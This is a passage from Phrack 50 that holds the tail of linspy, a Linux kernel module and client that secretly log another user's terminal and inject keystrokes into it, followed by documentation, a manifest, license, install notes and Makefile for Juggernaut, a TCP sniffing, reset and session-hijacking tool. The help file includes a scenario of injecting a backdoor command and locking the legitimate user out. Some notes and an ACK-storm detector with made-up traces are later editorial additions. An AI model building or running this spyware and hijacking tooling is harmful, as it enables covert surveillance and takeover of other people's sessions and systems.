MOD_INC_USE_COUNT;
return 0;
}
/* close the ltap device */
static void linspy_close(struct inode *in, struct file *fi)
{
taken_over=0;
tty_minor = -1;
MOD_DEC_USE_COUNT;
}
/* some ioctl operations */
static int
linspy_ioctl(struct inode *in, struct file *fi, unsigned int cmd, unsigned long args)
{
#define LS_SETMAJOR 0
#define LS_SETMINOR 1
#define LS_FLUSHBUF 2
#define LS_TOGGLE 3
if(current->euid != 0) return -EIO;
switch(cmd)
{
case LS_SETMAJOR:
tty_major = args;
queue_head = 0;
queue_tail = 0;
break;
case LS_SETMINOR:
tty_minor = args;
queue_head = 0;
queue_tail = 0;
break;
case LS_FLUSHBUF:
queue_head=0;
queue_tail=0;
break;
case LS_TOGGLE:
if(taken_over) taken_over=0;
else taken_over=1;
break;
default:
return 1;
}
return 0;
}
/* positional initializer in the 1.2/2.0 file_operations layout */
static struct file_operations linspy = {
NULL,          /* lseek   */
linspy_read,   /* read    */
NULL,          /* write   */
NULL,          /* readdir */
NULL,          /* select  */
linspy_ioctl,  /* ioctl   */
NULL,          /* mmap    */
linspy_open,   /* open    */
linspy_close,  /* release */
NULL           /* fsync   */
};
/* init the loadable module */
int init_module(void)
{
original_write = sys_call_table[SYS_write];
sys_call_table[SYS_write] = new_write;
if(register_chrdev(linspy_major, "linspy", &linspy)) return -EIO;
return 0;
}
/* cleanup module before being removed */
void cleanup_module(void)
{
sys_call_table[SYS_write] = original_write;
unregister_chrdev(linspy_major, "linspy");
}
<--> end linspy.c
<++> linspy/ltread.c
/* NOTE: the header names were lost when this page was extracted; this is
   the set the code below needs (major()/minor() come from
   sys/sysmacros.h on glibc).  Treat it as a reconstruction. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <termios.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <sys/sysmacros.h>
struct termios save_termios;
int ttysavefd = -1;
int fd;
#ifndef DEVICE_NAME
#define DEVICE_NAME "/dev/ltap"
#endif
#define LS_SETMAJOR 0
#define LS_SETMINOR 1
#define LS_FLUSHBUF 2
#define LS_TOGGLE 3
/* inject one byte into the victim tty's input queue as if it were typed */
void stuff_keystroke(int fd, char key)
{
  ioctl(fd, TIOCSTI, &key);
}
int tty_cbreak(int fd)
{
struct termios buff;
if(tcgetattr(fd, &save_termios) < 0)
return -1;
buff = save_termios;
buff.c_lflag &= ~(ECHO | ICANON);
buff.c_cc[VMIN] = 0;
buff.c_cc[VTIME] = 0;
if(tcsetattr(fd, TCSAFLUSH, &buff) < 0)
return -1;
ttysavefd = fd;
return 0;
}
char *get_device(char *basedevice)
{
static char devname[1024];
int fd;
if(strlen(basedevice) > 128) return NULL;
if(basedevice[0] == '/')
strcpy(devname, basedevice);
else
sprintf(devname, "/dev/%s", basedevice);
fd = open(devname, O_RDONLY);
if(fd < 0) return NULL;
if(!isatty(fd)) return NULL;
close(fd);
return devname;
}
/* open the ltap device and tell the module which tty (by major/minor)
   to log; returns 0 on success, -1 on failure (the original fell off
   the end of the function without returning a value) */
int do_ioctl(char *device)
{
  struct stat mystat;
  if(stat(device, &mystat) < 0) return -1;
  fd = open(DEVICE_NAME, O_RDONLY);
  if(fd < 0) return -1;
  if(ioctl(fd, LS_SETMAJOR, major(mystat.st_rdev)) < 0) return -1;
  if(ioctl(fd, LS_SETMINOR, minor(mystat.st_rdev)) < 0) return -1;
  return 0;
}
void sigint_handler(int s)
{
exit(s);
}
void cleanup_atexit(void)
{
puts(" ");
if(ttysavefd >= 0)
tcsetattr(ttysavefd, TCSAFLUSH, &save_termios);
}
int main(int argc, char **argv)
{
  int my_tty;
  char *devname;
  unsigned char ch;
  int i;
  if(argc != 2)
  {
    fprintf(stderr, "%s ttyname\n", argv[0]);
    fprintf(stderr, "ttyname should NOT be your current tty!\n");
    exit(0);
  }
  devname = get_device(argv[1]);
  if(devname == NULL)
  {
    perror("get_device");
    exit(0);
  }
  /* put our own terminal into cbreak mode so keystrokes go straight to
     the victim's tty without local echo or line buffering */
  if(tty_cbreak(0) < 0)
  {
    perror("tty_cbreak");
    exit(0);
  }
  atexit(cleanup_atexit);
  signal(SIGINT, sigint_handler);
  if(do_ioctl(devname) < 0)
  {
    perror("do_ioctl");
    exit(0);
  }
  /* we need an open descriptor on the victim tty for TIOCSTI */
  my_tty = open(devname, O_RDWR);
  if(my_tty == -1) exit(0);
  setvbuf(stdout, NULL, _IONBF, 0);
  printf("[now monitoring session]\n");
  /* both reads are non-blocking (VMIN=VTIME=0 on stdin, and the ltap
     device returns 0 bytes when its ring is empty), so this loop spins */
  while(1)
  {
    i = read(0, &ch, 1);
    if(i > 0)
    {
      if(ch == 24)          /* Ctrl-X: toggle takeover mode */
      {
        ioctl(fd, LS_TOGGLE, 0);
        printf("[Takeover mode toggled]\n");
      }
      else stuff_keystroke(my_tty, ch);
    }
    i = read(fd, &ch, 1);
    if(i > 0)
      putchar(ch);
  }
  return 0;
}
<--> end ltread.c
EOF
.oO Phrack 50 Oo.
Volume Seven, Issue Fifty
6 of 16
J U G G E R N A U T
route|daemon9
a guild corporation production 1996/7
Please use the included extract.c utility to extract the files and then
read the Install file. Any problems/comments mail me route@infonexus.com.
A boot image is forthcoming that will allow a user to simply pop a disk
into most any networked PC and turn it into a Juggernaut workstation.
<++> Juggernaut/ClothLikeGauze/.help
Juggernaut 1.0 Help File
|--------
|Overview
|--------
Juggernaut is a robust network tool for the Linux OS. It contains several
modules offering a wide degree of functionality. Juggernaut has been tested
successfully on several different Linux machines on several different networks.
However, your mileage may vary depending on the network topologies of the
environment (ie: Smart hubbing will kill much of the packet sniffing
functionality...) and, to a lesser extent, the machine running Juggernaut.
If something doesn't work, use a network debugger and figure out why...
Juggernaut v1.0 was originally published in Phrack Magazine, issue 50, on
April 9, 1997.
Any serious problems/bugs or comments, please mail me:
route@infonexus.com
|---------------------
|Command Line Options
|---------------------
juggernaut -h
Quick help.
juggernaut -H
Dumps this help file.
juggernaut -v
By default, Juggernaut conveys error messages and other
diagnostic information to the user. Specifying this
option will cause Juggernaut to shut the hell up.
Not recommended unless you know what you are doing.
juggernaut -t xx [ juggernaut -t 5 ]
This option specifies the network read timeout (which
defaults to 10 seconds). This value reflects how long
Juggernaut will wait for network traffic before giving
up. In this case, it will wait 5 seconds.
juggernaut -s TOKEN [ juggernaut -s login ]
Dedicated sniffing mode. Juggernaut will drop to the
background and examine all TCP packets looking for
TOKEN. When TOKEN is located, it then isolates that
TCP circuit and captures the next 16 (the default
enticement factor) packets and logs them to a file. It
then resets and continues sifting through TCP traffic
looking for TOKEN.
juggernaut -s TOKEN -e xx [ juggernaut -s daemon9 -e 1000 ]
By specifying a larger enticement factor, you can
capture more packets from a session. This time, after
locating TOKEN, Juggernaut will capture 1000 packets
before resetting.
juggernaut
This starts the program in standard mode.
|-------------
|Menu Options
|-------------
This is the normal mode of operation for Juggernaut. This is where the magic
happens, this is where the fun is. The program will examine all network
traffic and add suitable TCP connections to the connection database (which
is viewed with option 1). After at least one connection is in the database,
you can start mucking around with it (connection construction and destruction
are indicated by the appearance of a "+" or a "-" at the console). Note
that connections involving a local interface may not show up (unless the
localhost is dual-homed).
One possible shortcoming of the program is the fact that it stores very
little state information about connections in the database. Juggernaut
collects whatever information it needs (and doesn't have) on the fly. As
such, a quiet connection (no traffic) will elude hijacking and resetting. The
benefit of this is the fact that the program does not have to tie itself up
updating the shared memory segment with state every time a packet flies by.
?) Help
This file.
0) Program information
Dumps some stuff...
1) Connection database
Dumps the current connection list and percent to
capacity. Gives the option to wipe the database.
2) Spy on a connection
Allows a user to spy on any connection in the database,
with the option of logging the entire session to a
file.
3) Reset a connection
Allows the user to destroy any existing connection in
the database.
4) Automated connection reset daemon
Allows the user to set up an automated TCP RST daemon
that will listen for connection request attempts
from a specified source host (and optionally a
destination host) and then reset them before they
have a chance to complete. Requires a source IP
address and optionally a destination address.
This module prints a "*" to the console each time a
connection request is seen and denied...
5) Simplex connection hijack
Allows the user to insert a command into a telnet
based TCP stream. A short ACK storm ensues until the
connection is subsequently reset.
6) Interactive connection hijack
Allows the user to take over a session from a
legitimate client. This desynchs the client from the
server as the user takes over. The resulting ACK
storm can be catastrophic and makes this interactive
session prone to failure. If both of the target hosts
are on an ethernet, expect a monumental ACK storm.
7) Packet assembly module
The Prometheus module. Construction of TCP, UDP, ICMP,
and IP packets. The user has complete control over
most of the header fields and can opt for generating a
pseudo-random value. This module is far from done and
needs some serious work.
8) Souper sekret option number eight
Sshh.
9) Step down
Quitter.
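The ACK storm that options 5 and 6 describe is also the best wire-level
signature of this kind of hijack. The detector below is an added example
and is not part of Juggernaut or the original help file: it runs over a
constructed trace of one TCP connection (a typed command, a spoofed
segment injected as the client, the server's reply, then the storm) and
flags a run of payload-free ACK segments in which one side keeps re-using
a sequence number below what that direction has already put on the wire,
which is exactly the two-divergent-views condition a hijack creates. The
sequence numbers and both traces are made up; a real deployment would feed
it segments decoded from a capture.

```c
#include <stdint.h>
#include <stdio.h>

/* One sniffed TCP segment of a single connection, reduced to what the
   detector needs.  dir: 0 = client->server, 1 = server->client. */
struct seg {
    int      dir;
    uint32_t seq;
    uint32_t ack;
    uint32_t len;    /* payload bytes */
    unsigned flags;  /* bitmask of the F_* values below */
};
#define F_SYN 0x02u
#define F_RST 0x04u
#define F_PSH 0x08u
#define F_ACK 0x10u

/*
 * Once an injected segment has advanced the server's idea of the client's
 * sequence number, the real client keeps sending empty ACKs from its old
 * seq, the server keeps answering with empty ACKs of its own, and no
 * payload moves.  We track the highest seq+len seen per direction; a run
 * of `threshold` consecutive payload-free ACK segments, at least one of
 * which re-uses a seq below its direction's high-water mark, is flagged.
 * Any payload, SYN or RST ends the run, so ordinary pipelined data and
 * duplicate ACKs from loss recovery do not trip it.
 * Returns the index of the segment that tripped the detector, or -1.
 */
int detect_ack_storm(const struct seg *s, int n, int threshold)
{
    uint32_t hiwater[2] = {0, 0};
    int seen[2] = {0, 0};
    int run = 0, stale = 0;

    for (int i = 0; i < n; i++) {
        int d = s[i].dir;
        uint32_t end = s[i].seq + s[i].len;
        int pure_ack = (s[i].flags & F_ACK) && !(s[i].flags & (F_SYN | F_RST))
                       && s[i].len == 0;

        if (!pure_ack) {
            run = 0;
            stale = 0;
        } else {
            /* an empty ACK whose seq is behind what this direction already
               put on the wire means two divergent views of the stream */
            if (seen[d] && (int32_t)(s[i].seq - hiwater[d]) < 0)
                stale++;
            run++;
            if (run >= threshold && stale > 0)
                return i;
        }
        if (!seen[d] || (int32_t)(end - hiwater[d]) > 0) {
            hiwater[d] = end;
            seen[d] = 1;
        }
    }
    return -1;
}

/* Constructed trace: a telnet command, a spoofed segment injected as the
   client (index 3), the server's answer to it, then the storm. */
static const struct seg STORM[] = {
    {0, 1000, 5000,  5, F_PSH|F_ACK},  /* client types a command           */
    {1, 5000, 1005, 30, F_PSH|F_ACK},  /* server output                    */
    {0, 1005, 5030,  0, F_ACK},        /* client acks it                   */
    {0, 1005, 5030,  8, F_PSH|F_ACK},  /* injected: spoofed as the client  */
    {1, 5030, 1013, 50, F_PSH|F_ACK},  /* server answers the injection     */
    {0, 1005, 5030,  0, F_ACK},        /* real client: ack 1013 is past its
                                          snd.nxt, so it re-states itself  */
    {1, 5080, 1013,  0, F_ACK},        /* server: seq 1005 is old, re-states */
    {0, 1005, 5030,  0, F_ACK},
    {1, 5080, 1013,  0, F_ACK},
    {0, 1005, 5030,  0, F_ACK},
    {1, 5080, 1013,  0, F_ACK},
};
#define STORM_N ((int)(sizeof STORM / sizeof STORM[0]))

/* Constructed healthy trace: pipelined server data, then a quiet exchange
   of empty ACKs in which every seq matches its sender's high-water mark. */
static const struct seg LEGIT[] = {
    {0, 1000, 5000,  5, F_PSH|F_ACK},
    {1, 5000, 1005, 30, F_PSH|F_ACK},
    {1, 5030, 1005, 30, F_PSH|F_ACK},
    {0, 1005, 5030,  0, F_ACK},
    {0, 1005, 5060,  0, F_ACK},
    {1, 5060, 1005,  0, F_ACK},
    {0, 1005, 5060,  0, F_ACK},
    {1, 5060, 1005,  0, F_ACK},
    {0, 1005, 5060,  0, F_ACK},
    {1, 5060, 1005,  0, F_ACK},
};
#define LEGIT_N ((int)(sizeof LEGIT / sizeof LEGIT[0]))

int main(void)
{
    int hit = detect_ack_storm(STORM, STORM_N, 6);
    printf("storm trace: %s\n", hit >= 0 ? "ACK storm detected" : "clean");
    printf("legit trace: %s\n",
           detect_ack_storm(LEGIT, LEGIT_N, 6) >= 0 ? "ACK storm detected" : "clean");
    return 0;
}
```

The threshold is deliberately a parameter: on a LAN the storm described
above produces hundreds of these segments per second, so a value of a few
dozen within a short window is a comfortable alarm level, while a lower
value catches the short burst that precedes the RST in the simplex hijack.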
|-------------
|Suggested Use
|-------------
scenario 1: The passive observer
menu options 1,2
The user is curious. She simply waits for
connections to arrive and then passively observes
them. Several invocations of Juggernaut may be
started, each spying on a different connection.
The user does not modify the flow of data or control.
scenario 2: The malicious observer
menu options 1,2,3
Same scenario as above, except the user alters the
flow of control and opts to destroy connections
at some point.
scenario 3: The active observer
menu options 1,2,3,5,(6)
Same as the previous situations, however the user
inserts data into the stream before destroying it.
scenario 4: The imp
menu options 1,2,3,4
The user is an impish devil and simply wants to
cause trouble by setting up multiple ACRST daemons.
scenario 5: The active observer with poisonous reverse
menu options 1,2,4,5
The user waits until a client establishes a connection
with a targeted server and then sets up the ACRST
daemon to destroy all further connection-request
attempts from the client. The user then spies on the
connection, waiting for an opportune time to inject
a hijack packet into the stream containing a
backdooring command/pipeline. The client will then
have her connection RST (after a brief ACK storm).
If the client attempts to re-establish the connection
with the server, she will be denied and will likely think
it is a transient network error. The user can then
log into the server using the backdoor without fear
of the client logging back in.
Juggernaut is a Guild Corporation production, (c) 1996/7.
[corporate persuasion through Internet terrorism]
EOF
<-->
<++> Juggernaut/ClothLikeGauze/MANIFEST
File Manifest for Juggernaut 1.0
----------------------------
1996/7 daemon9[guild|phrack|r00t]
----------------------------
ClothLikeGauze/ Docs
.help Helpfile
copyright The legal tie that binds.
Install Installation instructions
MANIFEST This file
Makefile makefile
NumberOneCrush/ Sources
main.c main logic
mem.c shared memory/semaphore functions
menu.c menu functions
prometheus.c packet assembly workshop module
net.c socket/network functions
surplus.c dumping ground
Version history
---------------
version a1:
-----------
11.30.96: Decided to start. Juggernaut framework and queue stuff. Used
linked list queue originally to store connections.
12.01.96: Sniffing/spying/logging/RST stuff.
12.02-04: Not sure what I did here. I think I had a large turkey samich.
12.05.96: Redid memory abstract data type. Multithreaded. Implemented
shared memory segment and semaphore for access control.
Dumped ALL the dynamic memory allocation code.
12.06.96: Added packet assembly workshop hooks. Added curses. Removed
curses.
12.07.96: No coding today.
12.08.96: Non-interactive hijacking completed. I think we're ready for
beta now.
version b1:
-----------
12.09.96: IP_HDRINCL crap added.
12.15-18: I was in NYC for the r00tparty. No coding then.
12.19.96: Added automated RST stuff.
12.20-27: No coding.
12.28.96: Started work on interactive hijacking. Damned ACK storms.
12.30.96: Started packet assembly module for reals.
version b2:
-----------
01.25.97: Added network timeout logic.
01.26.97-
04.01.97: How can you possibly expect me to account for all that time?
I went to Germany with alhambra for a networking summit and
all over the US for other work, I was even in a Discovery
special on IW...
version 1.0:
------------
04.02.97: Here it is.
<-->
<++> Juggernaut/ClothLikeGauze/ToDo
Juggernaut ToDo list
--------------------
+ re-structure multitasking model to give the option of
using multi-processing OR multi-threading
+ Create boot image
+ Support for ongoing connections
+ Support for healthy choice hotdog sequencer
+ Add arp cache seeding routine; as connections are added, MAC
addresses will be added to the arp cache
+ Add support for different verbosity levels
+ Add support for IP and TCP options in packet assembly module
+ Better packet assembly support as a whole
+ Better code module plug-in support
+ much more robust packet sniffing module with support for
multiple protocols
+ um, interactive hijacking that doesn't kill the client
<-->
<++> Juggernaut/ClothLikeGauze/copyright
Juggernaut
Copyright (c) 1996/7 by daemon9/route [Guild] (route@infonexus.com)
Juggernaut source code, documentation, auxiliary programs, and
executables are Copyright 1996/7 daemon9[guild]. All rights reserved.
----------------------------------------------------------------------
GNU GENERAL PUBLIC LICENSE
Version 2, June 1991
Copyright (C) 1989, 1991 Free Software Foundation, Inc.
675 Mass Ave, Cambridge, MA 02139, USA
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The licenses for most software are designed to take away your
freedom to share and change it. By contrast, the GNU General Public
License is intended to guarantee your freedom to share and change free
software--to make sure the software is free for all its users. This
General Public License applies to most of the Free Software
Foundation's software and to any other program whose authors commit to
using it. (Some other Free Software Foundation software is covered by
the GNU Library General Public License instead.) You can apply it to
your programs, too.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
this service if you wish), that you receive source code or can get it
if you want it, that you can change the software or use pieces of it
in new free programs; and that you know you can do these things.
To protect your rights, we need to make restrictions that forbid
anyone to deny you these rights or to ask you to surrender the rights.
These restrictions translate to certain responsibilities for you if you
distribute copies of the software, or if you modify it.
For example, if you distribute copies of such a program, whether
gratis or for a fee, you must give the recipients all the rights that
you have. You must make sure that they, too, receive or can get the
source code. And you must show them these terms so they know their
rights.
We protect your rights with two steps: (1) copyright the software, and
(2) offer you this license which gives you legal permission to copy,
distribute and/or modify the software.
Also, for each author's protection and ours, we want to make certain
that everyone understands that there is no warranty for this free
software. If the software is modified by someone else and passed on, we
want its recipients to know that what they have is not the original, so
that any problems introduced by others will not reflect on the original
authors' reputations.
Finally, any free program is threatened constantly by software
patents. We wish to avoid the danger that redistributors of a free
program will individually obtain patent licenses, in effect making the
program proprietary. To prevent this, we have made it clear that any
patent must be licensed for everyone's free use or not licensed at all.
The precise terms and conditions for copying, distribution and
modification follow.
GNU GENERAL PUBLIC LICENSE
TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
0. This License applies to any program or other work which contains
a notice placed by the copyright holder saying it may be distributed
under the terms of this General Public License. The "Program", below,
refers to any such program or work, and a "work based on the Program"
means either the Program or any derivative work under copyright law:
that is to say, a work containing the Program or a portion of it,
either verbatim or with modifications and/or translated into another
language. (Hereinafter, translation is included without limitation in
the term "modification".) Each licensee is addressed as "you".
Activities other than copying, distribution and modification are not
covered by this License; they are outside its scope. The act of
running the Program is not restricted, and the output from the Program
is covered only if its contents constitute a work based on the
Program (independent of having been made by running the Program).
Whether that is true depends on what the Program does.
1. You may copy and distribute verbatim copies of the Program's
source code as you receive it, in any medium, provided that you
conspicuously and appropriately publish on each copy an appropriate
copyright notice and disclaimer of warranty; keep intact all the
notices that refer to this License and to the absence of any warranty;
and give any other recipients of the Program a copy of this License
along with the Program.
You may charge a fee for the physical act of transferring a copy, and
you may at your option offer warranty protection in exchange for a fee.
2. You may modify your copy or copies of the Program or any portion
of it, thus forming a work based on the Program, and copy and
distribute such modifications or work under the terms of Section 1
above, provided that you also meet all of these conditions:
a) You must cause the modified files to carry prominent notices
stating that you changed the files and the date of any change.
b) You must cause any work that you distribute or publish, that in
whole or in part contains or is derived from the Program or any
part thereof, to be licensed as a whole at no charge to all third
parties under the terms of this License.
c) If the modified program normally reads commands interactively
when run, you must cause it, when started running for such
interactive use in the most ordinary way, to print or display an
announcement including an appropriate copyright notice and a
notice that there is no warranty (or else, saying that you provide
a warranty) and that users may redistribute the program under
these conditions, and telling the user how to view a copy of this
License. (Exception: if the Program itself is interactive but
does not normally print such an announcement, your work based on
the Program is not required to print an announcement.)
These requirements apply to the modified work as a whole. If
identifiable sections of that work are not derived from the Program,
and can be reasonably considered independent and separate works in
themselves, then this License, and its terms, do not apply to those
sections when you distribute them as separate works. But when you
distribute the same sections as part of a whole which is a work based
on the Program, the distribution of the whole must be on the terms of
this License, whose permissions for other licensees extend to the
entire whole, and thus to each and every part regardless of who wrote it.
Thus, it is not the intent of this section to claim rights or contest
your rights to work written entirely by you; rather, the intent is to
exercise the right to control the distribution of derivative or
collective works based on the Program.
In addition, mere aggregation of another work not based on the Program
with the Program (or with a work based on the Program) on a volume of
a storage or distribution medium does not bring the other work under
the scope of this License.
3. You may copy and distribute the Program (or a work based on it,
under Section 2) in object code or executable form under the terms of
Sections 1 and 2 above provided that you also do one of the following:
a) Accompany it with the complete corresponding machine-readable
source code, which must be distributed under the terms of Sections
1 and 2 above on a medium customarily used for software interchange; or,
b) Accompany it with a written offer, valid for at least three
years, to give any third party, for a charge no more than your
cost of physically performing source distribution, a complete
machine-readable copy of the corresponding source code, to be
distributed under the terms of Sections 1 and 2 above on a medium
customarily used for software interchange; or,
c) Accompany it with the information you received as to the offer
to distribute corresponding source code. (This alternative is
allowed only for noncommercial distribution and only if you
received the program in object code or executable form with such
an offer, in accord with Subsection b above.)
The source code for a work means the preferred form of the work for
making modifications to it. For an executable work, complete source
code means all the source code for all modules it contains, plus any
associated interface definition files, plus the scripts used to
control compilation and installation of the executable. However, as a
special exception, the source code distributed need not include
anything that is normally distributed (in either source or binary
form) with the major components (compiler, kernel, and so on) of the
operating system on which the executable runs, unless that component
itself accompanies the executable.
If distribution of executable or object code is made by offering
access to copy from a designated place, then offering equivalent
access to copy the source code from the same place counts as
distribution of the source code, even though third parties are not
compelled to copy the source along with the object code.
4. You may not copy, modify, sublicense, or distribute the Program
except as expressly provided under this License. Any attempt
otherwise to copy, modify, sublicense or distribute the Program is
void, and will automatically terminate your rights under this License.
However, parties who have received copies, or rights, from you under
this License will not have their licenses terminated so long as such
parties remain in full compliance.
5. You are not required to accept this License, since you have not
signed it. However, nothing else grants you permission to modify or
distribute the Program or its derivative works. These actions are
prohibited by law if you do not accept this License. Therefore, by
modifying or distributing the Program (or any work based on the
Program), you indicate your acceptance of this License to do so, and
all its terms and conditions for copying, distributing or modifying
the Program or works based on it.
6. Each time you redistribute the Program (or any work based on the
Program), the recipient automatically receives a license from the
original licensor to copy, distribute or modify the Program subject to
these terms and conditions. You may not impose any further
restrictions on the recipients' exercise of the rights granted herein.
You are not responsible for enforcing compliance by third parties to
this License.
7. If, as a consequence of a court judgment or allegation of patent
infringement or for any other reason (not limited to patent issues),
conditions are imposed on you (whether by court order, agreement or
otherwise) that contradict the conditions of this License, they do not
excuse you from the conditions of this License. If you cannot
distribute so as to satisfy simultaneously your obligations under this
License and any other pertinent obligations, then as a consequence you
may not distribute the Program at all. For example, if a patent
license would not permit royalty-free redistribution of the Program by
all those who receive copies directly or indirectly through you, then
the only way you could satisfy both it and this License would be to
refrain entirely from distribution of the Program.
If any portion of this section is held invalid or unenforceable under
any particular circumstance, the balance of the section is intended to
apply and the section as a whole is intended to apply in other
circumstances.
It is not the purpose of this section to induce you to infringe any
patents or other property right claims or to contest validity of any
such claims; this section has the sole purpose of protecting the
integrity of the free software distribution system, which is
implemented by public license practices. Many people have made
generous contributions to the wide range of software distributed
through that system in reliance on consistent application of that
system; it is up to the author/donor to decide if he or she is willing
to distribute software through any other system and a licensee cannot
impose that choice.
This section is intended to make thoroughly clear what is believed to
be a consequence of the rest of this License.
8. If the distribution and/or use of the Program is restricted in
certain countries either by patents or by copyrighted interfaces, the
original copyright holder who places the Program under this License
may add an explicit geographical distribution limitation excluding
those countries, so that distribution is permitted only in or among
countries not thus excluded. In such case, this License incorporates
the limitation as if written in the body of this License.
9. The Free Software Foundation may publish revised and/or new versions
of the General Public License from time to time. Such new versions will
be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.
Each version is given a distinguishing version number. If the Program
specifies a version number of this License which applies to it and "any
later version", you have the option of following the terms and conditions
either of that version or of any later version published by the Free
Software Foundation. If the Program does not specify a version number of
this License, you may choose any version ever published by the Free Software
Foundation.
10. If you wish to incorporate parts of the Program into other free
programs whose distribution conditions are different, write to the author
to ask for permission. For software which is copyrighted by the Free
Software Foundation, write to the Free Software Foundation; we sometimes
make exceptions for this. Our decision will be guided by the two goals
of preserving the free status of all derivatives of our free software and
of promoting the sharing and reuse of software generally.
NO WARRANTY
11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN
OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS
TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE
PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
REPAIR OR CORRECTION.
12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES.
END OF TERMS AND CONDITIONS
Appendix: How to Apply These Terms to Your New Programs
If you develop a new program, and you want it to be of the greatest
possible use to the public, the best way to achieve this is to make it
free software which everyone can redistribute and change under these terms.
To do so, attach the following notices to the program. It is safest
to attach them to the start of each source file to most effectively
convey the exclusion of warranty; and each file should have at least
the "copyright" line and a pointer to where the full notice is found.
<one line to give the program's name and a brief idea of what it does.>
Copyright (C) 19yy <name of author>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
Also add information on how to contact you by electronic and paper mail.
If the program is interactive, make it output a short notice like this
when it starts in an interactive mode:
Gnomovision version 69, Copyright (C) 19yy name of author
Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
This is free software, and you are welcome to redistribute it
under certain conditions; type `show c' for details.
The hypothetical commands `show w' and `show c' should show the appropriate
parts of the General Public License. Of course, the commands you use may
be called something other than `show w' and `show c'; they could even be
mouse-clicks or menu items--whatever suits your program.
You should also get your employer (if you work as a programmer) or your
school, if any, to sign a "copyright disclaimer" for the program, if
necessary. Here is a sample; alter the names:
Yoyodyne, Inc., hereby disclaims all copyright interest in the program
`Gnomovision' (which makes passes at compilers) written by James Hacker.
<signature of Ty Coon>, 1 April 1989
Ty Coon, President of Vice
This General Public License does not permit incorporating your program into
proprietary programs. If your program is a subroutine library, you may
consider it more useful to permit linking proprietary applications with the
library. If this is what you want to do, use the GNU Library General
Public License instead of this License.
<-->
<++> Juggernaut/Install
Juggernaut 1.0 Installation Instructions
----------------------------------------
1. Are you a fucking moron? If so, goto step 6; you are done.
2. Edit the Makefile. You may wish to change a few of the
defines:
USENAME: Define this to have Juggernaut attempt to
resolve IP addresses into FQDNs... It's
slower but more verbose this way.
MULTI_P: Define this to use multi-process model of
multi-tasking.
THREAD: Define this to use multi-threaded model of
multi-tasking. Be sure to also link in
the pthreads library. Not implemented yet.
IP_HDRINCL: Define this if you want/need to use the
IP_HDRINCL socket option to build IP
headers.
NOHUSH: If defined, Juggernaut will notify the user
audibly when a connection is added.
GREED: If defined, Juggernaut will attempt to add
any and ALL TCP based connections to the
database. This is not recommended unless
you know what you are doing...
FASTCHECK: Define this to use a fast x86 assembler
implementation of the IP checksum routine.
May not work on all systems. That's why
you have the option.
3. make all
4. yay.
5. ./juggernaut -h
<-->
<++> Juggernaut/Makefile
# Juggernaut Makefile
# 1996/7 daemon9[guild|phrack|r00t]
CC = gcc
#LIBS = -L/usr/lib -lpthread
CFLAGS = -O3 -funroll-loops -fomit-frame-pointer -pipe -m486 #-Wall
DEFINES = -DMULTI_P -DNOHUSH -DUSENAME -DFASTCHECK
DEFINES += #-DGREED #-DIP_HDRINCL #-DTHREAD
OBJECTS = NumberOneCrush/main.o NumberOneCrush/menu.o\
NumberOneCrush/mem.o NumberOneCrush/prometheus.o\
NumberOneCrush/net.o NumberOneCrush/surplus.o
.c.o:
	$(CC) $(CFLAGS) $(DEFINES) -c $< -o $@
all: JUGGERNAUT
JUGGERNAUT: $(OBJECTS)
	$(CC) $(CFLAGS) $(DEFINES) $(OBJECTS) $(LIBS) -o juggernaut
	strip juggernaut
clean:
	rm -f core juggernaut juggernaut.log.snif juggernaut.log.spy
	rm -rf NumberOneCrush/*.o
<-->
<++> Juggernaut/NumberOneCrush/main.c
/*
*
* Juggernaut
* Version b2
*
* 1996/7 Guild productions
* daemon9[guild|phrack|r00t]
*
* comments to route@infonexus.com
*
* This coding project made possible by a grant from the Guild corporation
*
* main.c - main control logic and program driver. Consists mainly of wrappers
* to setup the main subfunctions.
*
*
*/
/* The header names were lost in transcription; the list below is
   reconstructed from the calls main.c actually makes. */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <strings.h>
#include <ctype.h>
#include <signal.h>
#include <time.h>
